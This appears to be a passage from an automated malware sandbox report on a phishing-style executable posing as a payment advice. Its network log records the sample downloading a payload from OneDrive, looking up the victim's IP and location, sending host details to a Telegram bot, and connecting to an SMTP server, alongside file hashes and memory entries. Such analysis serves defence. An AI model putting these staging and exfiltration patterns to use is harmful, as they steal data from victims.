    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0hEZxsrRoqaJwEjavlY1C0HnnnqgMKZuGY%2BUJI7JzQgmsQSxmcLemmrPjBdzRCwHLH1vChfLXaC0qAAaxhHVKIS9MycNZXlBivRk3%2FeYZtut%2FUe1Y%2FEHImNW%2FZsahUqqaUUP5jpp"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e38a1bcabd93dca-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=79428&sent=13&recv=22&lost=0&retrans=0&sent_bytes=12968&recv_bytes=1126&delivery_rate=75593&cwnd=257&unsent_bytes=0&cid=fa7bc93dce3a2b11&ts=2565&x=0"
  • flag-us
    DNS
    73.247.226.132.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.247.226.132.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    134.177.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.177.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.telegram.org
    PayeeAdvice_HK54912_R0038704_37504.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
    PayeeAdvice_HK54912_R0038704_37504.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Sat, 16 Nov 2024 15:49:35 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    mail.foodex.com.pk
    PayeeAdvice_HK54912_R0038704_37504.exe
    Remote address:
    8.8.8.8:53
    Request
    mail.foodex.com.pk
    IN A
    Response
    mail.foodex.com.pk
    IN CNAME
    foodex.com.pk
    foodex.com.pk
    IN A
    37.27.123.72
  • flag-us
    DNS
    92.12.20.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    92.12.20.2.in-addr.arpa
    IN PTR
    Response
    92.12.20.2.in-addr.arpa
    IN PTR
    a2-20-12-92deploystaticakamaitechnologiescom
  • flag-us
    DNS
    72.123.27.37.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    72.123.27.37.in-addr.arpa
    IN PTR
    Response
    72.123.27.37.in-addr.arpa
    IN PTR
    server43 hndserversnet
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88deploystaticakamaitechnologiescom
  • flag-us
    DNS
    83.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    83.210.23.2.in-addr.arpa
    IN PTR
    Response
    83.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-83deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 13.107.42.12:443
    https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content
    tls, http
    PayeeAdvice_HK54912_R0038704_37504.exe
    1.2kB
    10.9kB
    14
    14

    HTTP Request

    GET https://api.onedrive.com/v1.0/shares/s!Ak1b_TF9hoG0fK5urEn6TsYKM_Y/root/content

    HTTP Response

    302
  • 13.107.42.12:443
    https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin
    tls, http
    PayeeAdvice_HK54912_R0038704_37504.exe
    11.1kB
    297.8kB
    223
    223

    HTTP Request

    GET https://fa3hwa.dm.files.1drv.com/y4mEprthCF5mq6ohjyODH5IqEX9-zxOXMFMn1SBjkig9TMJ0iW6hgdn3JyiMZPOzrO4b7j6aZi_6ijPwhelKeUnPxDOGjlqm8sCQ6PsJqBTReZUlLMc7dAcR7XlNz2TvpwYv2DEMCQktobmlzTemLYAZHbCHN5XyR1CyXP4MLrlsiLaHWYTUMx7UdGkSNmTxrk-jRRJigmuo_I0CVq8QFAgzw/kuqVmvhlro64.bin

    HTTP Response

    200
  • 132.226.247.73:80
    http://checkip.dyndns.org/
    http
    PayeeAdvice_HK54912_R0038704_37504.exe
    2.3kB
    3.8kB
    23
    14

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200
  • 172.67.177.134:443
    https://reallyfreegeoip.org/xml/181.215.176.83
    tls, http
    PayeeAdvice_HK54912_R0038704_37504.exe
    2.2kB
    14.9kB
    25
    16

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
    tls, http
    PayeeAdvice_HK54912_R0038704_37504.exe
    1.2kB
    6.7kB
    11
    11

    HTTP Request

    GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:KBKWGEBK%0D%0ADate%20and%20Time:%2011/16/2024%20/%203:49:33%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20KBKWGEBK%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

    HTTP Response

    404
  • 37.27.123.72:587
    mail.foodex.com.pk
    smtp-submission
    PayeeAdvice_HK54912_R0038704_37504.exe
    2.0kB
    1.3kB
    16
    17
  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    140.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    140.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    api.onedrive.com
    dns
    PayeeAdvice_HK54912_R0038704_37504.exe
    62 B
    284 B
    1
    1

    DNS Request

    api.onedrive.com

    DNS Response

    13.107.42.12

  • 8.8.8.8:53
    fa3hwa.dm.files.1drv.com
    dns
    PayeeAdvice_HK54912_R0038704_37504.exe
    70 B
    279 B
    1
    1

    DNS Request

    fa3hwa.dm.files.1drv.com

    DNS Response

    13.107.42.12

  • 8.8.8.8:53
    12.42.107.13.in-addr.arpa
    dns
    71 B
    92 B
    1
    1

    DNS Request

    12.42.107.13.in-addr.arpa

  • 8.8.8.8:53
    checkip.dyndns.org
    dns
    PayeeAdvice_HK54912_R0038704_37504.exe
    64 B
    176 B
    1
    1

    DNS Request

    checkip.dyndns.org

    DNS Response

    132.226.247.73
    193.122.6.168
    193.122.130.0
    158.101.44.242
    132.226.8.169

  • 8.8.8.8:53
    reallyfreegeoip.org
    dns
    PayeeAdvice_HK54912_R0038704_37504.exe
    65 B
    97 B
    1
    1

    DNS Request

    reallyfreegeoip.org

    DNS Response

    172.67.177.134
    104.21.67.152

  • 8.8.8.8:53
    73.247.226.132.in-addr.arpa
    dns
    73 B
    158 B
    1
    1

    DNS Request

    73.247.226.132.in-addr.arpa

  • 8.8.8.8:53
    134.177.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    134.177.67.172.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    PayeeAdvice_HK54912_R0038704_37504.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    mail.foodex.com.pk
    dns
    PayeeAdvice_HK54912_R0038704_37504.exe
    64 B
    94 B
    1
    1

    DNS Request

    mail.foodex.com.pk

    DNS Response

    37.27.123.72

  • 8.8.8.8:53
    92.12.20.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    92.12.20.2.in-addr.arpa

  • 8.8.8.8:53
    72.123.27.37.in-addr.arpa
    dns
    71 B
    108 B
    1
    1

    DNS Request

    72.123.27.37.in-addr.arpa

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    83.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    83.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nsn9ABB.tmp\System.dll

    Filesize

    11KB

    MD5

    fc90dfb694d0e17b013d6f818bce41b0

    SHA1

    3243969886d640af3bfa442728b9f0dff9d5f5b0

    SHA256

    7fe77ca13121a113c59630a3dba0c8aaa6372e8082393274da8f8608c4ce4528

    SHA512

    324f13aa7a33c6408e2a57c3484d1691ecee7c3c1366de2bb8978c8dc66b18425d8cab5a32d1702c13c43703e36148a022263de7166afdce141da2b01169f1c6

  • memory/1948-25-0x00000000398E0000-0x0000000039E84000-memory.dmp

    Filesize

    5.6MB

  • memory/1948-26-0x0000000039E90000-0x0000000039F2C000-memory.dmp

    Filesize

    624KB

  • memory/1948-36-0x000000003AD20000-0x000000003AD2A000-memory.dmp

    Filesize

    40KB

  • memory/1948-35-0x000000003AC30000-0x000000003ACC2000-memory.dmp

    Filesize

    584KB

  • memory/1948-16-0x0000000077D85000-0x0000000077D86000-memory.dmp

    Filesize

    4KB

  • memory/1948-22-0x0000000077CE1000-0x0000000077E01000-memory.dmp

    Filesize

    1.1MB

  • memory/1948-20-0x0000000000480000-0x00000000016D4000-memory.dmp

    Filesize

    18.3MB

  • memory/1948-23-0x0000000072BDE000-0x0000000072BDF000-memory.dmp

    Filesize

    4KB

  • memory/1948-33-0x0000000072BD0000-0x0000000073380000-memory.dmp

    Filesize

    7.7MB

  • memory/1948-24-0x0000000000480000-0x00000000004CA000-memory.dmp

    Filesize

    296KB

  • memory/1948-15-0x0000000077D68000-0x0000000077D69000-memory.dmp

    Filesize

    4KB

  • memory/1948-27-0x0000000072BD0000-0x0000000073380000-memory.dmp

    Filesize

    7.7MB

  • memory/1948-28-0x000000003A3F0000-0x000000003A5B2000-memory.dmp

    Filesize

    1.8MB

  • memory/1948-29-0x000000003A5D0000-0x000000003A620000-memory.dmp

    Filesize

    320KB

  • memory/1948-31-0x0000000072BDE000-0x0000000072BDF000-memory.dmp

    Filesize

    4KB

  • memory/1948-32-0x000000003A6B0000-0x000000003ABDC000-memory.dmp

    Filesize

    5.2MB

  • memory/2600-13-0x0000000077CE1000-0x0000000077E01000-memory.dmp

    Filesize

    1.1MB

  • memory/2600-12-0x0000000077CE1000-0x0000000077E01000-memory.dmp

    Filesize

    1.1MB

  • memory/2600-14-0x0000000010004000-0x0000000010005000-memory.dmp

    Filesize

    4KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.